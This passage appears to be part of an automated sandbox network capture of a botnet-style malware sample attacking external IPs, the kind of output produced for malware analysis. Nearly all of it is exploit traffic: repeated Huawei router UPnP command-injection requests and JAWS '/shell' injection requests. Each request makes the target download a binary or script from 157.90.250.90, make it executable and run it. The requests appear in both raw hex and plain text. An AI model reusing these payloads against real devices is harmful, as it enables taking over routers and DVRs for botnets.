                                                          86192.168.2.235231649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:02.098743916 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:01Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.2338108156.235.102.17137215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:02.515189886 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:06.543833971 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:12.686981916 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:24.717281103 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:48.777868986 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:37.922952890 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.235234249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:02.777920008 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:02Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.235006223.37.135.6580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.045010090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.345462084 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 33 34 37 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 33 26 23 34 36 3b 32 39 31 36 31 63 37 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;b834768&#46;1704173043&#46;29161c76</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.23406145.212.32.280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.060009003 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.016184092 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:05.935945034 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.871370077 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:17.554280996 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:32.908107996 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:05.159574032 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.2357618162.159.129.10380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.166357040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.2350076181.206.2.4680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.265615940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.234117852.50.137.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.282073975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.522138119 CET425INHTTP/1.1 301 Moved Permanently
